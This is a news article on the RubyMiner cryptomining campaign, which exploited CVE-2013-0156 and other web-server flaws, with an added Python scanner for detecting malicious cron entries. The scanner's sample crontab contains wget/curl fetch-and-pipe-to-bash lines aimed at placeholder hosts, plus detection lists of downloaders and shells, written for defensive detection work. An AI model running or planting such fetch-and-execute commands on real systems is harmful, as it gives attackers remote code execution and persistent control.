RubyMiner malware plants XMRig on vulnerable systems. Security researchers have 
discovered malware aimed at Linux and Windows web servers that enlists them to mine cryptocurrency. 

According to researchers at Check Point, attackers have used malware called RubyMiner to infect 
systems with a cryptocurrency miner called XMRig. 

Researchers said in a blog post that over a 24-hour period last week, hackers attempted to 
compromise 30 percent of networks worldwide, probing for vulnerable web servers that could be 
recruited into their mining pool. It said that the top countries targeted include the United States, 
Germany, the United Kingdom, Norway and Sweden, though no country has gone unscathed. 

Security firm Certego also noticed a huge spike in attacks. It said in a blog post that the exploit 
attempts to leverage a fairly old vulnerability, CVE-2013-0156, that allows remote code execution in Ruby on Rails. 

According to Check Point, the attacker attempts to use multiple web server vulnerabilities to inject the 
malicious code onto the vulnerable machines. “Among the targeted servers we found attacks on PHP, 
Microsoft IIS, and Ruby on Rails,” they said. 

Check Point researchers said that the hacker also made use of known vulnerabilities in Ruby on 
Rails and Microsoft IIS. The Ruby on Rails attack vector, a base64-encoded payload, exploits CVE-2013-0156. 

The attacker sends a base64-encoded payload inside a POST request in the hope that the Ruby 
interpreter configured on the server will execute it. 

“This is a very simple bash script that adds a new entry in the crontab of the host. The cronjob is 
executed once per hour (notice the number 1: it means every first minute of every hour) and it 
downloads the file robots.txt via wget. The file is piped through bash, so most probably it's a text file 
containing a shell script,” said researchers at Certego. 

Check Point researchers said that it is interesting to note that the scheduler isn't just being told to run 
the mining process every hour, it is being told to run the whole process, which includes downloading 
the file from the server. 

“This is possibly to allow the attacker to initiate an immediate kill switch for the miner bot. If the 
attacker would like to end the process on the infected machines, all that needs to be done is modify 
the robots.txt file on the compromised Webserver to be inactive. Within a minute, all the machines 
re-downloading the file will be receiving files without the cryptominers,” said Check Point researchers. 
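The persistence mechanism both teams describe (an hourly cron entry that re-fetches a file over HTTP and pipes it straight into a shell) is easy to hunt for on a suspected host. The following is an added example, not code from Check Point, Certego or this article: a Python scanner that reads crontab text, flags entries whose pipeline downloads something and then hands it to a shell, and spells out the schedule so an analyst sees the "minute 1 of every hour" pattern at a glance. The crontab lines and the example.invalid URLs are constructed for the example and are not indicators from the campaign.

```python
from __future__ import annotations

import shlex
from dataclasses import dataclass

# Constructed sample crontab for this example. The URLs are placeholders,
# not indicators taken from the article or the Check Point/Certego reports.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
1 * * * * wget -q -O - http://example.invalid/robots.txt | bash
*/5 * * * * curl -s https://example.invalid/update.sh | sh
30 6 * * 1 /opt/backup/run.sh
@hourly /usr/bin/curl -fsSL https://example.invalid/r.txt | bash
"""

DOWNLOADERS = {"wget", "curl", "fetch"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
CRON_ALIASES = {
    "@hourly": "every hour, at minute 0",
    "@daily": "once a day",
    "@weekly": "once a week",
    "@monthly": "once a month",
    "@reboot": "at boot",
}


@dataclass
class Finding:
    schedule: str  # raw five-field schedule or @alias
    when: str      # human-readable interpretation of the schedule
    command: str   # the command cron would run


def _pipeline_stages(command: str) -> list[list[str]]:
    """Split a shell command on '|' and tokenise each stage."""
    stages = []
    for stage in command.split("|"):
        try:
            stages.append(shlex.split(stage))
        except ValueError:  # unbalanced quotes; fall back to whitespace split
            stages.append(stage.split())
    return stages


def fetches_and_pipes_to_shell(command: str) -> bool:
    """True when an earlier pipeline stage downloads and a later stage is a shell."""
    seen_download = False
    for tokens in _pipeline_stages(command):
        if not tokens:
            continue
        prog = tokens[0].rsplit("/", 1)[-1]  # drop any leading path
        if prog in DOWNLOADERS:
            seen_download = True
        elif seen_download and prog in SHELLS:
            return True
    return False


def describe_schedule(fields: list[str]) -> str:
    """Explain the common shapes; anything else is reported as 'other schedule'."""
    minute, hour, rest = fields[0], fields[1], fields[2:]
    if minute.isdigit() and hour == "*" and all(f == "*" for f in rest):
        return f"every hour, at minute {int(minute)}"
    if minute.startswith("*/") and minute[2:].isdigit() and hour == "*":
        return f"every {minute[2:]} minutes"
    return "other schedule"


def scan_crontab(text: str) -> list[Finding]:
    """Return every entry that downloads content and pipes it into a shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or KEY=VALUE environment line
        if line.startswith("@"):
            alias, _, command = line.partition(" ")
            schedule, when = alias, CRON_ALIASES.get(alias, "unknown alias")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed entry, nothing to run
            schedule = " ".join(parts[:5])
            when, command = describe_schedule(parts[:5]), parts[5]
        if fetches_and_pipes_to_shell(command):
            findings.append(Finding(schedule, when, command))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"[{f.schedule}] {f.when}: {f.command}")
```

On a live host, feed it the output of `crontab -l` for each user, the files under /etc/cron.d and the spool directory (typically /var/spool/cron or /var/spool/cron/crontabs), rather than the embedded sample. The detector keys on the download-then-pipe shape rather than on a particular hostname or file name, which is deliberate: the kill-switch design Check Point describes means the fetched file can change at any time, so the stable signal is the recurring fetch itself.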

Check Point said that one of the domains used in this attack, lochjol.com, was seen being used in 
another attack back in 2013. The previous attack also leveraged the vulnerability in Ruby on Rails, 
and shares some common features with the current attack. 

“Nonetheless, we cannot determine the connection between the two, and, even if they share a 
common attacker, their purposes seem to be different,” said researchers. “In 2018, as in 2017, we 
continue to see blitz campaigns, leveraging unpatched vulnerabilities in many networks. This attack, 
like its predecessors, could have been prevented by simply patching old servers and deploying 
relevant security measures.” 

Javvad Malik, security advocate at AlienVault, told SC Media UK that as cryptocurrencies gain 
popularity and value, they become a more attractive target to cyber-criminals. 

“Due to the fact that more and more variants emerge frequently, businesses should keep systems 
updated where possible, and invest in threat detection and response controls that can detect where 
malicious techniques are being used to mine cryptocurrencies,” he said. 

Andy Norton, director of threat intelligence at Lastline, told SC Media UK that Monero is taking over as 
the “bad boy” of cryptocurrencies due to its fungible nature and CPU friendly algorithm. 

“Mining payloads are becoming much more prevalent,” he said. “100 percent of internet connected 
networks experience compromise attempts on a daily basis. Best practice guidance on protecting 
infrastructure remains unchanged.” 